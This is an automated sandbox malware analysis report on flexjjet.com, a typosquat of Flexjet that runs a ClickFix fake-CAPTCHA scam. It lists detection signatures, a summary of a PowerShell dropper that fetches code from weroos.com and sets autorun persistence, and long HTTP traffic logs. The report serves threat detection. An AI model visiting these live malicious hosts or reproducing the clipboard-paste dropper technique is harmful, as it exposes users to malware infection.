Windows Analysis Report
http://flexjjet.com

General Information

Sample URL: http://flexjjet.com
Analysis ID: 1710272
Infos: yarasigma

Detection

CAPTCHA Scam ClickFix
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

AI detected phishing page
Detect drive by download via clipboard copy & paste
Malicious sample detected (through community Yara rule)
Yara detected CAPTCHA Scam ClickFix
AI detected malicious Powershell script
AI detected suspicious URL
Bypasses PowerShell execution policy
Creates autostart registry keys with suspicious values (likely registry only malware)
Found pyInstaller with non standard icon
Found suspicious powershell code related to unpacking or dynamic code loading
HTML page adds suspicious text to clipboard
Loading BitLocker PowerShell Module
Obfuscated command line found
Powershell drops PE file
Suspicious powershell command line found
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Phishing

Source: https://flexjjet.com/?type=3 Joe Sandbox AI: Score: 8 Reasons: The brand 'Flexjet' is a known private jet service provider., The URL 'flexjjet.com' contains a misspelling of the legitimate domain 'flexjet.com' with an extra 'j'., Misspellings in domain names are a common tactic used in phishing attempts., The URL does not match the legitimate domain name associated with the brand 'Flexjet'. DOM: 4.5.pages.csv
Source: Yara match File source: 4.6.pages.csv, type: HTML
Source: Yara match File source: 4.5.pages.csv, type: HTML
Source: Yara match File source: dropped/chromecache_2096, type: DROPPED
Source: Dropped: runme.ps1.19.dr Joe Sandbox AI: Found malicious Powershell script: Script shows multiple high-risk behaviors: downloads and executes code from suspicious domain (weroos.com), creates persistence in Temp directory, uses mutex to ensure single instance, installs crypto libraries, and performs hidden setup of Python environment. Pattern matches typical malware dropper/loader behavior.
Source: http://flexjjet.com Joe Sandbox AI: The URL 'http://flexjjet.com' closely resembles the legitimate URL 'http://flexjet.com', which is associated with the known brand Flexjet. The primary difference is the addition of an extra 'j' in the domain name, which is a common tactic in typosquatting to create visual similarity and potentially confuse users. There are no subdomains or unusual domain extensions that suggest a different legitimate purpose. The similarity score is high due to the minimal character difference, and the likelihood of typosquatting is also high given the context and the nature of the alteration.
Source: https://flexjjet.com Joe Sandbox AI: The URL 'https://flexjjet.com' closely resembles the legitimate URL 'https://www.flexjet.com'. The primary difference is the addition of an extra 'j' in the domain name, which is a common tactic in typosquatting to create visual similarity and potentially confuse users. The legitimate brand, Flexjet, is a known private jet service provider. The similarity score is high due to the minimal character difference and the potential for user confusion. The likelihood of this being a typosquatting attempt is also high, given the structural similarity and the absence of any contextual indicators suggesting a different legitimate purpose for the domain.
Source: https://duckduckgo.com/ HTTP Parser: Total embedded image size: 45036
Source: https://duckduckgo.com/?t=h_&q=flexjet&ia=web HTTP Parser: Total embedded image size: 18122
Source: https://flexjjet.com/ HTTP Parser: No favicon
Source: https://duckduckgo.com/?t=h_&q=flexjet&ia=web HTTP Parser: No favicon
Source: https://flexjjet.com/?type=3 HTTP Parser: No favicon
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\LICENSE.txt
Source: chrome.exe Memory has grown: Private usage: 5MB later: 53MB
Source: global traffic HTTP traffic detected: GET /SDkwjk.txt HTTP/1.1 Host: weroos.com Connection: Keep-Alive
Source: Network traffic Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.16:49737 -> 20.83.18.132:443
Source: C:\Temp\PyEnv\python.exe Code function: 26_2_00007FF8068A57E0 recv, 26_2_00007FF8068A57E0
Source: global traffic HTTP traffic detected: GET /static-assets/font/ProximaNova-RegIt-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /static-assets/font/ProximaNova-Reg-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /_next/static/css/4f43f24a80f858fd.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /_next/static/css/cbe9deb940241e83.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /static-assets/font/ProximaNova-Sbold-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /static-assets/font/ProximaNova-Bold-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /static-assets/font/ProximaNova-ExtraBold-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /_next/static/css/b7b5059dc782a8cf.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/webpack-902dadd63ccf3ed3.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/7331-e58a744914d0d2ab.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/7522-0997b064ba451bfa.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/183-8cf06e00742c0795.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/1108-469b2dba26dd3aef.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/8375-2ff8f582fa9b0644.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/7018-71bf9d9d00512827.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/684-9f33fd7065606a5d.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/9409-ec79edf1a159066e.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/6670-c4545a71dfc7a774.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/8434-81496f6f33c6bc97.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/pages/%5Blocale%5D-243ab4cdb820daa9.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/B-ys9soUGnFD59xVO_HFJ/_buildManifest.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/B-ys9soUGnFD59xVO_HFJ/_ssgManifest.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/css/70e12d59aa4832cd.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/main-6185e562568e6345.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/1617-8c004864fca5b9d3.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/1740-e0a18841e5b93473.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/6759-9f9ea0a9a829d630.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/framework-19baaf6675f9027b.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/9239-fc9e093bd4420738.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/pages/_app-09222264323827fc.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/117-b363b5bad35a955b.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/3133.60921f077c442aa1.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /country.json HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /privacy-pro-eligible.json HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /static-assets/image/pages/home/devices-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /static-assets/backgrounds/homepage-btf-mobile-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /static-assets/backgrounds/homepage-btf-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /_next/static/media/macos.e15f833d.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /_next/data/B-ys9soUGnFD59xVO_HFJ/about.json HTTP/1.1host: duckduckgo.comx-nextjs-data: 1sec-ch-ua-platform: "Windows"purpose: prefetchuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /_next/static/media/chrome-lg.a4859fb2.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
